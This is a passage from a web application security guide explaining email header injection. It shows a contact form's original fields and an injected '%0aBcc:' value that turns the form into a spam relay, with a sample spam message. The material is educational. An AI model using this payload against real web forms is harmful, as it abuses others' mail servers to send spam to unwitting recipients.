Web application security - the fast guide 1.1 | Page 145
Chapter 7 - Attack execution (3)
P a g e | 145
Attack process:
the original form listing is as follow:
To: [email protected]
From: [email protected]
Subject: Site problem
Confirm Order page doesn’t load
Attacker will simply add bcc header to the user email address and the same
message will be sent to the set addresses.
%0aBcc:[email protected]
And can add the spam message contents, thus the full SMTP request will be as
follow
To: [email protected]
From:
[email protected]%0aBcc:[email protected]
m
Subject: SPAAAAAM SUBBJECT
Hello dear receiver this Is the spam message contents.